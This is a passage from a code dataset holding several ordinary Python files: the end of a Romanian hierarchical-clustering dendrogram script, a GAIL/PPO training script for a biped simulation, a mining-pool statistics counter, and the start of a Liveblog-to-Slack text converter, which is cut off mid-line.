float(\"inf\")\n index = 0\n for i in range(0, len(lista_elemente_din_matrice)):\n for j in range(0, len(lista_elemente_din_matrice)):\n if i > j:\n if matrice[i,j] < distanta_minima:\n pozitii_distante_minime.clear()\n distanta_minima = matrice[i,j]\n pozitii_distante_minime.append([i,j])\n elif matrice[i,j] == distanta_minima:\n pozitii_distante_minime.append([i,j])\n\n for i in range (0, len(pozitii_distante_minime)):\n distanta_minima_locala = float(\"inf\")\n lista_puncte_distanta_a = list()\n lista_puncte_distanta_b = list()\n lista_puncte_distanta_pozitii_a = list()\n lista_puncte_distanta_pozitii_b = list()\n if isinstance(lista_elemente_din_matrice[pozitii_distante_minime[i][0]], Punct):\n 
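# A bare Punct is tracked directly; clusters are flattened into their\n            # member points by pune_puncte_in_cluster() below.\n            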
lista_puncte_distanta_a.append(lista_elemente_din_matrice[pozitii_distante_minime[i][0]])\n elif isinstance(lista_elemente_din_matrice[pozitii_distante_minime[i][0]], Cluster):\n pune_puncte_in_cluster(lista_elemente_din_matrice[pozitii_distante_minime[i][0]], lista_puncte_distanta_a)\n if isinstance(lista_elemente_din_matrice[pozitii_distante_minime[i][1]], Punct):\n lista_puncte_distanta_b.append(lista_elemente_din_matrice[pozitii_distante_minime[i][1]])\n elif isinstance(lista_elemente_din_matrice[pozitii_distante_minime[i][1]], Cluster):\n pune_puncte_in_cluster(lista_elemente_din_matrice[pozitii_distante_minime[i][1]], lista_puncte_distanta_b)\n\n for p in range(0, len(lista_puncte_distanta_a)):\n lista_puncte_distanta_pozitii_a.append(get_pozitie_punct(lista_puncte_distanta_a[p]))\n\n for q in range(0, len(lista_puncte_distanta_b)):\n lista_puncte_distanta_pozitii_b.append(get_pozitie_punct(lista_puncte_distanta_b[q]))\n\n for p in range(0, len(lista_puncte_distanta_pozitii_a)):\n for q in range(0, len(lista_puncte_distanta_pozitii_b)):\n if lista_puncte_distanta_pozitii_a[p] < min_litera_pozitie:\n min_litera_pozitie = lista_puncte_distanta_pozitii_a[p]\n if lista_puncte_distanta_pozitii_b[q] < min_litera_pozitie:\n min_litera_pozitie = lista_puncte_distanta_pozitii_b[q]\n if abs(lista_puncte_distanta_pozitii_a[p]-lista_puncte_distanta_pozitii_b[q]) < distanta_minima_locala:\n distanta_minima_locala = abs(lista_puncte_distanta_pozitii_a[p]-lista_puncte_distanta_pozitii_b[q])\n if distanta_minima_locala < distanta_min:\n distanta_min = distanta_minima_locala\n index = i\n elif distanta_minima_locala == distanta_min:\n for p in range(0, len(lista_puncte_distanta_pozitii_a)):\n if lista_puncte_distanta_pozitii_a[p] == min_litera_pozitie:\n index = i\n for q in range(0, len(lista_puncte_distanta_pozitii_b)):\n if lista_puncte_distanta_pozitii_b[q] == min_litera_pozitie:\n index = i\n\n return pozitii_distante_minime[index]\n\ndef genereaza_matrice_distante(lista_elemente_din_matrice):\n matrice_distante = {}\n for i in range(0, len(lista_elemente_din_matrice)):\n for j in range(0, len(lista_elemente_din_matrice)):\n distanta = calculeaza_distanta(lista_elemente_din_matrice[i], lista_elemente_din_matrice[j])\n matrice_distante[i,j] = distanta\n return matrice_distante\n\ndef getClusterPosition(lista_clustere, cluster):\n for i in range (0, len(lista_clustere)):\n if lista_clustere[i].element1 == cluster.element1 and lista_clustere[i].element2 == cluster.element2:\n return i\n return -1\n\n\ndef init():\n global lista_puncte\n global d\n input_file = open(input_file_name,\"rb\").read()\n input_file = bytes_to_string(input_file)\n instante = input_file.split(\"\\r\\n\")\n\n for instanta in instante:\n if \";\" in instanta:\n coordonate_instanta = instanta.split(\";\")\n d=len(coordonate_instanta)\n else:\n coordonate_instanta = [instanta]\n d=1\n\n punct = Punct(coordonate_instanta)\n lista_puncte.append(punct)\n\n\ndef main():\n global dendrograma\n global punctX\n global punctY\n global ratieInaltime\n global lista_clustere\n\n init()\n\n for punct in lista_puncte:\n print(punct.coordonate)\n\n lista_elemente_din_matrice = lista_puncte[:]\n\n while len(lista_elemente_din_matrice) > 1:\n\n matrice_distante_curenta = genereaza_matrice_distante(lista_elemente_din_matrice)\n\n distanta_minima = get_distante_minime(matrice_distante_curenta, lista_elemente_din_matrice)\n\n cluster = Cluster(lista_elemente_din_matrice[distanta_minima[0]], lista_elemente_din_matrice[distanta_minima[1]])\n 
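# Each merge is recorded so the dendrogram can label it C1, C2, ...\n        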
lista_clustere.append(cluster)\n\n lista_elemente_din_matrice.pop(distanta_minima[0])\n lista_elemente_din_matrice.pop(distanta_minima[1])\n lista_elemente_din_matrice.append(cluster)\n\n dendrograma = cluster\n\n\nmain()\n\nfor punct in lista_puncte:\n print(str(punct))\n\ndef deseneaza_arbore(cluster, pozitieX, pozitieY, latime):\n global ratieInaltime\n\n item1 = None\n item2 = None\n aux = None\n if isinstance(cluster, Cluster):\n\n item1 = cluster.element2\n item2 = cluster.element1\n\n deseneaza_nod(cluster, pozitieX, pozitieY, latime)\n\n if isinstance(item1, Punct):\n deseneaza_punct(item1, pozitieX, pozitieY+ratieInaltime*cluster.inaltime+bufferInaltime)\n\n if isinstance(item2, Punct):\n deseneaza_punct(item2, pozitieX+latime, pozitieY+ratieInaltime*cluster.inaltime+bufferInaltime)\n\n deseneaza_arbore(item1, pozitieX-latime/4, pozitieY+ratieInaltime*cluster.inaltime+bufferInaltime, latime/2)\n\n deseneaza_arbore(item2, pozitieX+(latime+latime/2)/2, pozitieY+ratieInaltime*cluster.inaltime+bufferInaltime, latime/2)\n\n\ndef deseneaza_nod(cluster, coordonataX, coordonataY, width):\n linie = Line(Point(coordonataX, coordonataY), Point(coordonataX+width, coordonataY))\n linie.setWidth(3)\n linie.draw(win)\n\n label = Text(Point(coordonataX, coordonataY-10), str(\"C\") + str(getClusterPosition(lista_clustere, cluster)+1))\n label.draw(win)\n\n label = Text(Point(coordonataX+30, coordonataY+20), str(\"h=\") + str(cluster.inaltime)[:4])\n label.draw(win)\n\n linie = Line(Point(coordonataX, coordonataY), Point(coordonataX, coordonataY+ratieInaltime*cluster.inaltime+bufferInaltime))\n linie.setWidth(3)\n linie.draw(win)\n\n linie = Line(Point(coordonataX+width, coordonataY), Point(coordonataX+width, coordonataY+ratieInaltime*cluster.inaltime+bufferInaltime))\n linie.setWidth(3)\n linie.draw(win)\n\ndef deseneaza_punct(cluster, coordonataX, coordonataY):\n punctDeDesenat = Circle(Point(coordonataX, coordonataY), 7)\n punctDeDesenat.setFill('blue')\n punctDeDesenat.draw(win)\n\n label = Text(Point(coordonataX, coordonataY+20), str(cluster))\n label.draw(win)\n\n\nmessage = Text(Point(win.getWidth()/2, 20), 'Click anywhere to quit.')\nmessage.draw(win)\n\ndeseneaza_arbore(dendrograma, punctX, punctY, latime)\n\nwin.getMouse()\nwin.close()","sub_path":"clusterizare bottom-up/dendrograma.py","file_name":"dendrograma.py","file_ext":"py","file_size_in_byte":12768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"110918184","text":"import gym\nimport time\nimport os\nimport os.path as osp\nimport dataset\nfrom dataset import Dataset\nimport logger\nimport argparse\nimport datetime\n\nimport tensorflow as tf\nimport utils.tf_util as U\nimport numpy as np\n\nfrom cg import cg\nfrom discriminator_transition import Discriminator\nfrom utils.mujoco_dset import Dset_transition\nfrom utils.misc_util import set_global_seeds, zipsame, boolean_flag\nfrom utils.math_util import explained_variance\nfrom utils.console_util import fmt_row, colorize\nfrom contextlib import contextmanager\nfrom mpi4py import MPI\nfrom collections import deque\nfrom mpi_adam import MpiAdam\nfrom statistics import stats\nfrom mlp_policy import MlpPolicy\nfrom box import Box\n\ndef traj_segment_generator(pi, env, reward_giver, horizon, stochastic):\n # Initialize state variables\n t = 0\n ac = env.action_space.sample()\n new = True\n rew = 0.0\n true_rew = 0.0\n ob = env.reset()\n\n cur_ep_ret = 0\n cur_ep_len = 0\n cur_ep_true_ret = 0\n ep_true_rets = []\n ep_rets = []\n 
ep_lens = []\n\n # Initialize history arrays\n obs = np.array([ob for _ in range(horizon)])\n next_obs = obs.copy()\n transitions = obs.copy()\n true_rews = np.zeros(horizon, 'float32')\n rews = np.zeros(horizon, 'float32')\n vpreds = np.zeros(horizon, 'float32')\n news = np.zeros(horizon, 'int32')\n acs = np.array([ac for _ in range(horizon)])\n prevacs = acs.copy()\n\n while True:\n prevac = ac\n masked_ob = ob.copy()\n masked_ob[0] = 0 # mask root_x\n ac, vpred = pi.act(stochastic=stochastic, ob=masked_ob)\n # Slight weirdness here because we need value function at time T\n # before returning segment [0, T-1] so we get the correct\n # terminal value\n if t > 0 and t % horizon == 0:\n yield {\"ob\": obs, \"next_ob\": next_obs, \"transitions\":transitions, \"rew\": rews, \"vpred\": vpreds, \"new\": news,\n \"ac\": acs, \"prevac\": prevacs, \"nextvpred\": vpred * (1 - new),\n \"ep_rets\": ep_rets, \"ep_lens\": ep_lens, \"ep_true_rets\": ep_true_rets}\n _, vpred = pi.act(stochastic=stochastic, ob=masked_ob)\n # Be careful!!! if you change the downstream algorithm to aggregate\n # several of these batches, then be sure to do a deepcopy\n ep_rets = []\n ep_true_rets = []\n ep_lens = []\n i = t % horizon\n\n obs[i] = masked_ob\n vpreds[i] = vpred\n news[i] = new\n acs[i] = ac\n prevacs[i] = prevac\n\n ob_len = len(ob)\n next_ob, true_rew, new, _ = env.step(ac)\n pos_0 = ob[:ob_len//2].copy()\n pos_1 = next_ob[:ob_len//2].copy()\n pos_1[0] -= pos_0[0]\n pos_0[0] = 0\n\n transition = np.concatenate([pos_0, pos_1])\n transitions[i] = transition\n d_rew = 10 * reward_giver.get_reward(transition)\n \n next_obs[i] = next_ob\n ob = next_ob\n\n rews[i] = d_rew\n true_rews[i] = true_rew\n\n cur_ep_ret += d_rew\n cur_ep_true_ret += true_rew\n cur_ep_len += 1\n if new:\n ep_rets.append(cur_ep_ret)\n ep_true_rets.append(cur_ep_true_ret)\n ep_lens.append(cur_ep_len)\n cur_ep_ret = 0\n cur_ep_true_ret = 0\n cur_ep_len = 0\n ob = env.reset()\n t += 1\n\ndef add_vtarg_and_adv(seg, gamma, lam):\n new = np.append(seg[\"new\"], 0) # last element is only used for last vtarg, but we already zeroed it if last new = 1\n vpred = np.append(seg[\"vpred\"], seg[\"nextvpred\"])\n T = len(seg[\"rew\"])\n seg[\"adv\"] = gaelam = np.empty(T, 'float32')\n rew = seg[\"rew\"]\n lastgaelam = 0\n for t in reversed(range(T)):\n nonterminal = 1-new[t+1]\n delta = rew[t] + gamma * vpred[t+1] * nonterminal - vpred[t]\n gaelam[t] = lastgaelam = delta + gamma * lam * nonterminal * lastgaelam\n seg[\"tdlamret\"] = seg[\"adv\"] + seg[\"vpred\"]\n\n\ndef learn(env, policy_func, reward_giver, expert_dataset, rank, ckpt_dir, task_name,\n g_step=1, save_per_iter=100, g_optim_batchsize=64,\n timesteps_per_batch=4096, clip_param=0.2, entcoeff=0.01, g_optim_epochs=4,\n gamma=0.99, lam=0.95, adam_epsilon=1e-5, lr_schedule='linear',\n g_stepsize=1e-4, d_stepsize=1e-4, \n max_timesteps=0,\n callback=None):\n\n nworkers = MPI.COMM_WORLD.Get_size()\n rank = MPI.COMM_WORLD.Get_rank()\n np.set_printoptions(precision=3)\n # Setup losses and stuff\n # ----------------------------------------\n ob_space = env.observation_space\n ac_space = env.action_space\n pi = policy_func(\"pi\", ob_space, ac_space)\n oldpi = policy_func(\"oldpi\", ob_space, ac_space)\n atarg = tf.placeholder(dtype=tf.float32, shape=[None]) # Target advantage function (if applicable)\n ret = tf.placeholder(dtype=tf.float32, shape=[None]) # Empirical return\n lrmult = tf.placeholder(name='lrmult', dtype=tf.float32, shape=[]) # learning rate multiplier, updated with schedule\n 
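# PPO clipped surrogate: maximize E[min(ratio*A, clip(ratio, 1-eps, 1+eps)*A)],\n    # where eps = clip_param is annealed by lrmult along with the learning rate.\n    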
clip_param = clip_param * lrmult # Annealed cliping parameter epislon\n \n ob = U.get_placeholder_cached(name=\"ob\")\n ac = pi.pdtype.sample_placeholder([None])\n\n kloldnew = oldpi.pd.kl(pi.pd)\n ent = pi.pd.entropy()\n meankl = tf.reduce_mean(kloldnew)\n meanent = tf.reduce_mean(ent)\n pol_entpen = (-entcoeff) * meanent\n # entbonus = entcoeff * meanent\n\n \n\n ratio = tf.exp(pi.pd.logp(ac) - oldpi.pd.logp(ac)) # advantage * pnew / pold\n\n surr1 = ratio * atarg \n surr2 = tf.clip_by_value(ratio, 1.0 - clip_param, 1.0 + clip_param) * atarg\n # PPO's pessimistic surrogate (L^CLIP)\n pol_surr = - tf.reduce_mean(tf.minimum(surr1, surr2))\n vferr = tf.reduce_mean(tf.square(pi.vpred - ret))\n total_loss = pol_surr + pol_entpen + vferr\n\n losses = [pol_surr, pol_entpen, vferr, meankl, meanent]\n loss_names = [\"pol_surr\", \"pol_entpen\", \"vf_loss\", \"kl\", \"ent\"]\n var_list = pi.get_trainable_variables()\n \n\n\n g_adam = MpiAdam(var_list, epsilon=adam_epsilon)\n d_adam = MpiAdam(reward_giver.get_trainable_variables())\n\n get_flat = U.GetFlat(var_list)\n set_from_flat = U.SetFromFlat(var_list)\n\n\n assign_old_eq_new = U.function([], [], updates=[tf.assign(oldv, newv)\n for (oldv, newv) in zipsame(oldpi.get_variables(), pi.get_variables())])\n\n lossandgrad = U.function([ob, ac, atarg, ret, lrmult],\n [U.flatgrad(total_loss, var_list)] + losses)\n\n clipped_ratio = tf.reduce_mean(tf.to_float(tf.greater(tf.abs(ratio - 1.0), clip_param)))\n ac_std = tf.reduce_mean(pi.pd.std)\n compute_clipped_ratio = U.function([ob, ac, atarg, ret, lrmult],[clipped_ratio])\n compute_ac_std = U.function([ob, ac, atarg, ret, lrmult],[ac_std])\n compute_losses = U.function([ob, ac, atarg, ret, lrmult],\n losses)\n\n @contextmanager\n def timed(msg):\n if rank == 0:\n print(colorize(msg, color='magenta'))\n tstart = time.time()\n yield\n print(colorize(\"done in %.3f seconds\" % (time.time() - tstart), color='magenta'))\n else:\n yield\n\n def allmean(x):\n assert isinstance(x, np.ndarray)\n out = np.empty_like(x)\n MPI.COMM_WORLD.Allreduce(x, out, op=MPI.SUM)\n out /= nworkers\n return out\n\n U.initialize()\n th_init = get_flat()\n MPI.COMM_WORLD.Bcast(th_init, root=0)\n set_from_flat(th_init)\n g_adam.sync()\n d_adam.sync()\n if rank == 0:\n print(\"Init param sum\", th_init.sum(), flush=True)\n\n # Prepare for rollouts\n # ----------------------------------------\n seg_gen = traj_segment_generator(pi, env, reward_giver, timesteps_per_batch, stochastic=True)\n\n episodes_so_far = 0\n timesteps_so_far = 0\n iters_so_far = 0\n tstart = time.time()\n lenbuffer = deque(maxlen=40) # rolling buffer for episode lengths\n rewbuffer = deque(maxlen=40) # rolling buffer for episode rewards\n true_rewbuffer = deque(maxlen=40)\n\n\n\n replay_buffer = {'transitions':[]}\n\n\n\n while True:\n if callback: callback(locals(), globals())\n if max_timesteps and timesteps_so_far >= max_timesteps:\n break\n\n\n # Save model\n if rank == 0 and iters_so_far % save_per_iter == 0 and ckpt_dir is not None:\n fname = osp.join(ckpt_dir,\"%06d/%s\" %(iters_so_far, task_name))\n os.makedirs(os.path.dirname(fname), exist_ok=True)\n saver = tf.train.Saver()\n saver.save(tf.get_default_session(), fname)\n # Increase Env Max Time\n if iters_so_far % 500 == 0 and iters_so_far != 0:\n env.set_max_time(2 * env.get_max_time())\n\n if lr_schedule == 'constant':\n cur_lrmult = 1.0\n elif lr_schedule == 'linear':\n cur_lrmult = max(1.0 - float(timesteps_so_far) / max_timesteps, 0)\n else:\n raise NotImplementedError\n\n\n 
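        # Each iteration alternates GAIL-style updates: g_step rounds of PPO on rewards from the discriminator (reward_giver), followed by a discriminator update on generated vs. expert transition batches.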
logger.log(\"********** Iteration %i ************\" % iters_so_far)\n\n\n\n # ------------------ Update G ------------------\n logger.log(\"Optimizing Policy...\")\n for _ in range(g_step):\n with timed(\"sampling\"):\n seg = seg_gen.__next__()\n add_vtarg_and_adv(seg, gamma, lam)\n ob, ac, atarg, tdlamret = seg[\"ob\"], seg[\"ac\"], seg[\"adv\"], seg[\"tdlamret\"]\n transitions = seg[\"transitions\"]\n\n if len(replay_buffer['transitions']) > 100: \n replay_buffer['transitions'].pop(0)\n replay_buffer['transitions'].append(transitions)\n\n vpredbefore = seg[\"vpred\"] # predicted value function before udpate\n atarg = (atarg - atarg.mean()) / atarg.std() # standardized advantage function estimate\n\n if hasattr(pi, \"ob_rms\"): pi.ob_rms.update(ob) # update running mean/std for policy\n\n g_dataset = Dataset(dict(ob=ob, ac=ac, atarg=atarg, vtarg=tdlamret), shuffle=True)\n # set old parameter values to new parameter values\n assign_old_eq_new() \n logger.log(\"Optimizing...\")\n logger.log(fmt_row(13, loss_names))\n\n # Here we do a bunch of optimization epochs over the data\n for k in range(g_optim_epochs):\n # list of tuples, each of which gives the loss for a minibatch\n losses = []\n for i, batch in enumerate(g_dataset.iterate_once(g_optim_batchsize)):\n grad, *newlosses = lossandgrad(batch[\"ob\"], batch[\"ac\"],\n batch[\"atarg\"], batch[\"vtarg\"], cur_lrmult,\n )\n g_adam.update(grad, g_stepsize * cur_lrmult)\n losses.append(newlosses)\n logger.log(fmt_row(13, np.mean(losses, axis=0)))\n all_data = g_dataset.all_data()\n \n logger.record_tabular(\"MeanClippedRatio\", compute_clipped_ratio(all_data[\"ob\"], all_data[\"ac\"], all_data[\"atarg\"], all_data[\"vtarg\"], cur_lrmult)[0])\n logger.record_tabular(\"MeanAcStd\", compute_ac_std(all_data[\"ob\"], all_data[\"ac\"], all_data[\"atarg\"], all_data[\"vtarg\"], cur_lrmult)[0])\n\n\n # ------------------ Update D ------------------\n logger.log(\"Optimizing Discriminator...\")\n logger.log(fmt_row(13, reward_giver.loss_name))\n batch_size = 256\n d_losses = [] # list of tuples, each of which gives the loss for a minibatch\n\n transitions_all = np.concatenate(replay_buffer['transitions'], axis=0)\n # sample_idx = np.random.randint(0, transitions_all.shape[0], timesteps_per_batch*8)\n # transitions_downsample = transitions_all[sample_idx]\n\n for transition_batch, _ in dataset.iterbatches((transitions_all, transitions_all),\n include_final_partial_batch=False,\n batch_size=batch_size):\n transition_expert = expert_dataset.get_next_batch(len(transition_batch))\n # update running mean/std for reward_giver\n if hasattr(reward_giver, \"obs_rms\"): reward_giver.obs_rms.update(np.concatenate((transition_batch, transition_expert), 0))\n *newlosses, g = reward_giver.lossandgrad(transition_batch, transition_expert)\n d_adam.update(allmean(g), d_stepsize)\n d_losses.append(newlosses)\n logger.log(fmt_row(13, np.mean(d_losses, axis=0)))\n\n lrlocal = (seg[\"ep_lens\"], seg[\"ep_rets\"], seg[\"ep_true_rets\"]) # local values\n listoflrpairs = MPI.COMM_WORLD.allgather(lrlocal) # list of tuples\n\n def flatten_lists(listoflists):\n return [el for list_ in listoflists for el in list_]\n\n lens, rews, true_rets = map(flatten_lists, zip(*listoflrpairs))\n true_rewbuffer.extend(true_rets)\n lenbuffer.extend(lens)\n rewbuffer.extend(rews)\n\n\n \n\n logger.record_tabular(\"EpLenMean\", np.mean(lenbuffer))\n logger.record_tabular(\"EpRewMean\", np.mean(rewbuffer))\n logger.record_tabular(\"EpTrueRewMean\", np.mean(true_rewbuffer))\n # 
logger.record_tabular(\"EpThisIter\", len(lens))\n episodes_so_far += len(lens)\n timesteps_so_far += sum(lens) * g_step * g_optim_epochs\n iters_so_far += 1\n\n # logger.record_tabular(\"EpisodesSoFar\", episodes_so_far)\n logger.record_tabular(\"ItersSoFar\", iters_so_far)\n logger.record_tabular(\"TimestepsSoFar\", timesteps_so_far)\n # logger.record_tabular(\"TimeElapsed\", time.time() - tstart)\n\n if rank == 0:\n logger.dump_tabular()\n\n\n\n\ndef runner(env, policy_func, load_model_path, timesteps_per_batch, number_trajs,\n stochastic_policy, save=False, reuse=False):\n\n # Setup network\n # ----------------------------------------\n ob_space = env.observation_space\n ac_space = env.action_space\n pi = policy_func(\"pi\", ob_space, ac_space, reuse=reuse)\n U.initialize()\n # Prepare for rollouts\n # ----------------------------------------\n U.load_state(load_model_path)\n\n obs_list = []\n acs_list = []\n len_list = []\n ret_list = []\n from tqdm import tqdm\n for _ in tqdm(range(number_trajs)):\n traj = traj_1_generator(pi, env, timesteps_per_batch, stochastic=stochastic_policy)\n obs, acs, ep_len, ep_ret = traj['ob'], traj['ac'], traj['ep_len'], traj['ep_ret']\n obs_list.append(obs)\n acs_list.append(acs)\n len_list.append(ep_len)\n ret_list.append(ep_ret)\n if stochastic_policy:\n print('stochastic policy:')\n else:\n print('deterministic policy:')\n if save:\n filename = load_model_path.split('/')[-1] + '.' + env.spec.id\n np.savez(filename, obs=np.array(obs_list), acs=np.array(acs_list),\n lens=np.array(len_list), rets=np.array(ret_list))\n avg_len = sum(len_list)/len(len_list)\n avg_ret = sum(ret_list)/len(ret_list)\n print(\"Average length:\", avg_len)\n print(\"Average return:\", avg_ret)\n return avg_len, avg_ret\n\n# Sample one trajectory (until trajectory end)\ndef traj_1_generator(pi, env, horizon, stochastic):\n\n t = 0\n ac = env.action_space.sample() # not used, just so we have the datatype\n new = True # marks if we're on first timestep of an episode\n\n ob = env.reset()\n ob[0] = 0\n cur_ep_ret = 0 # return in current episode\n cur_ep_len = 0 # len of current episode\n\n # Initialize history arrays\n obs = []\n rews = []\n news = []\n acs = []\n\n while True:\n ac, vpred = pi.act(stochastic=stochastic, ob=ob)\n obs.append(ob)\n news.append(new)\n acs.append(ac)\n\n ob, rew, new, _ = env.step(ac)\n ob[0] = 0\n env.render()\n rews.append(rew)\n\n cur_ep_ret += rew\n cur_ep_len += 1\n if new or t >= horizon:\n break\n t += 1\n\n obs = np.array(obs)\n rews = np.array(rews)\n news = np.array(news)\n acs = np.array(acs)\n traj = {\"ob\": obs, \"rew\": rews, \"new\": news, \"ac\": acs,\n \"ep_ret\": cur_ep_ret, \"ep_len\": cur_ep_len}\n return traj\n\n\n\ndef main(args):\n U.make_session(num_cpu=1).__enter__()\n C = Box.from_yaml(filename=args.config)\n set_global_seeds(C.seed)\n\n from dp_env_biped_PID import DPEnv\n env = DPEnv(C)\n\n\n def policy_func(name, ob_space, ac_space, reuse=False):\n return MlpPolicy(name=name, ob_space=ob_space, ac_space=ac_space,\n reuse=reuse, hid_size=C.policy_hidden_size, num_hid_layers=C.num_hid_layers)\n\n if args.task == 'train':\n import logging\n import os.path as osp\n import bench\n\n gym.logger.setLevel(logging.INFO)\n save_name = str(datetime.datetime.now().strftime(\"%y%m%d-%H%M%S\"))\n save_name += \"-%s\" % (\"norm1\")\n save_name += \"-%s\" % osp.basename(args.config).split('.')[0]\n checkpoint_dir = osp.join(C.checkpoint_dir, save_name)\n log_dir = osp.join(checkpoint_dir, \"log\")\n task_name = 
C.motion_file.split('.')[0]\n\n if MPI is None or MPI.COMM_WORLD.Get_rank() == 0:\n os.makedirs(checkpoint_dir, exist_ok=True)\n C.to_yaml(osp.join(checkpoint_dir, \"config.yaml\"))\n logger.configure(dir=log_dir)\n\n if MPI.COMM_WORLD.Get_rank() != 0:\n logger.set_level(logger.DISABLED)\n else:\n logger.set_level(logger.INFO)\n\n\n env = bench.Monitor(env, logger.get_dir() and\n osp.join(logger.get_dir(), \"monitor.json\"))\n\n\n expert_dataset = Dset_transition(transitions = env.env.sample_expert_traj())\n ob_length = env.observation_space.shape[0] # shape of ob + act = shape of ob + next_ob\n reward_giver = Discriminator(ob_length, C.adversary_hidden_size, entcoeff=C.adversary_entcoeff)\n\n rank = MPI.COMM_WORLD.Get_rank()\n if rank != 0:\n logger.set_level(logger.DISABLED)\n workerseed = C.seed + 10000 * MPI.COMM_WORLD.Get_rank()\n set_global_seeds(workerseed)\n env.seed(workerseed)\n \n\n learn(env, policy_func, reward_giver, expert_dataset, rank, checkpoint_dir, task_name,\n g_step=C.g_step, save_per_iter=C.save_per_iter, g_optim_batchsize=C.g_optim_batchsize,\n timesteps_per_batch=C.timesteps_per_batch, clip_param=C.clip_param, entcoeff=C.entcoeff, g_optim_epochs=C.g_optim_epochs,\n gamma=C.gamma, lam=C.lam, adam_epsilon=C.adam_epsilon, lr_schedule=C.lr_schedule,\n g_stepsize=C.g_stepsize, d_stepsize=C.d_stepsize, \n max_timesteps=C.max_timesteps,\n callback=None)\n\n\n elif args.task == 'evaluate':\n runner(env,\n policy_func,\n args.load_model_path,\n timesteps_per_batch=1024,\n number_trajs=20,\n stochastic_policy=args.stochastic_policy,\n save=args.save_sample,\n )\n env.close()\n\ndef argsparser():\n parser = argparse.ArgumentParser(\"Tensorflow Implementation of GAIL\")\n parser.add_argument('--config', help='yaml config file path', type=str)\n # for evaluatation\n parser.add_argument('--task', type=str, choices=['train', 'evaluate', 'sample'], default='train')\n boolean_flag(parser, 'stochastic_policy', default=False, help='use stochastic/deterministic policy to evaluate')\n boolean_flag(parser, 'save_sample', default=False, help='save the trajectories or not')\n parser.add_argument('--load_model_path', help='if provided, load the model', type=str, default=None)\n return parser.parse_args()\n\nif __name__ == \"__main__\":\n args = argsparser()\n main(args)\n","sub_path":"src_gail/gail_ppo_PID_norm1.py","file_name":"gail_ppo_PID_norm1.py","file_ext":"py","file_size_in_byte":19804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"25928666","text":"from gevent import sleep\nfrom collections import deque\n\nimport threading\nimport logging\nimport time\n\n\nlogger = logging.getLogger('stats')\ncpu_times = (None, None)\n\n\ndef stat_rotater(server_state, celery):\n global cpu_times\n last_tick = int(time.time())\n last_send = (int(time.time()) // 60) * 60\n while True:\n now = time.time()\n # time to rotate minutes?\n if now > (last_send + 60):\n shares = server_state['shares'].tock()\n reject_low = server_state['reject_low'].tock()\n reject_dup = server_state['reject_dup'].tock()\n reject_stale = server_state['reject_stale'].tock()\n server_state['stratum_connects'].tock()\n server_state['stratum_disconnects'].tock()\n server_state['agent_connects'].tock()\n server_state['agent_disconnects'].tock()\n\n if shares or reject_dup or reject_low or reject_stale:\n celery.send_task_pp(\n 'add_one_minute', 'pool', shares, now, '', reject_dup,\n reject_low, reject_stale)\n last_send += 60\n\n # time to tick?\n if now > (last_tick + 
1):\n server_state['shares'].tick()\n server_state['reject_low'].tick()\n server_state['reject_dup'].tick()\n server_state['reject_stale'].tick()\n server_state['stratum_connects'].tick()\n server_state['stratum_disconnects'].tick()\n server_state['agent_connects'].tick()\n server_state['agent_disconnects'].tick()\n last_tick += 1\n\n sleep(0.1)\n\n\nclass StatManager(object):\n def __init__(self):\n self._val = 0\n self.mins = deque([], 60)\n self.seconds = deque([], 60)\n self.lock = threading.Lock()\n self.total = 0\n\n def incr(self, amount=1):\n \"\"\" Increments the counter \"\"\"\n with self.lock:\n self._val += amount\n __add__ = incr\n\n def tick(self):\n \"\"\" should be called once every second \"\"\"\n val = self.reset()\n self.seconds.append(val)\n self.total += val\n\n def tock(self):\n # rotate the total into a minute slot\n last_min = sum(self.seconds)\n self.mins.append(last_min)\n return last_min\n\n @property\n def hour(self):\n return sum(self.mins)\n\n @property\n def minute(self):\n return sum(self.seconds)\n\n @property\n def second_avg(self):\n return sum(self.seconds) / 60.0\n\n @property\n def min_avg(self):\n return sum(self.mins) / 60.0\n\n def summary(self):\n return dict(total=self.total,\n min_total=self.minute,\n hour_total=self.hour,\n min_avg=self.min_avg)\n\n def reset(self):\n \"\"\" Locks the counter, resets the value, then returns the value \"\"\"\n with self.lock:\n curr = self._val\n self._val = 0\n return curr\n","sub_path":"powerpool/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":2963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"588531023","text":"# -*- coding: utf-8 -*-\n#\n# Copyright 2016 dpa-infocom GmbH\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nimport bleach\nimport logging\nimport re\n\nfrom livebridge.base import BaseConverter, ConversionResult\n\nlogger = logging.getLogger(__name__)\n\nclass LiveblogSlackConverter(BaseConverter):\n\n source = \"liveblog\"\n target = \"slack\"\n\n async def _convert_text(self, item):\n logger.debug(\"CONVERTING TEXT\")\n content = \"\\n\"+item[\"item\"][\"text\"]\n content = content.replace(\" \", \" \")\n content = bleach.clean(content, tags=[\"p\", \"br\", \"b\", \"i\", \"strike\", \"ul\", \"li\", \"ol\", \"a\", \"div\"], strip=True)\n content = re.sub(r'(.*?)', '<\\\\1|\\\\2>', content, flags=re.I|re.M)\n content = content.replace(\"
<p>\", \"\").replace(\"</p>\", \"\\n\")\n        content = re.sub(r'[ ]+', ' ', content)\n        content = re.sub(r'&nbsp;', ' ', content)\n        content = content.replace(\"<div>\", \"\").replace(\"</div>\", \"\\n\")\n        content = content.replace(\"<ul>\", \"\\n\")\n        content = content.replace(\"<li>\", \" • \")\n        content = content.replace(\"</li>\", \"\\n\")\n        content = content.replace(\"</ul>\", \"\\n\")\n        content = content.replace(\"<ol>\", \"\\n\")\n        content = content.replace(\"</ol>\", \"\\n\")\n        content = content.replace(\"<b>\", \"*\")\n        content = content.replace(\"</b>\", \"* \")\n        content = content.replace(\"<br>
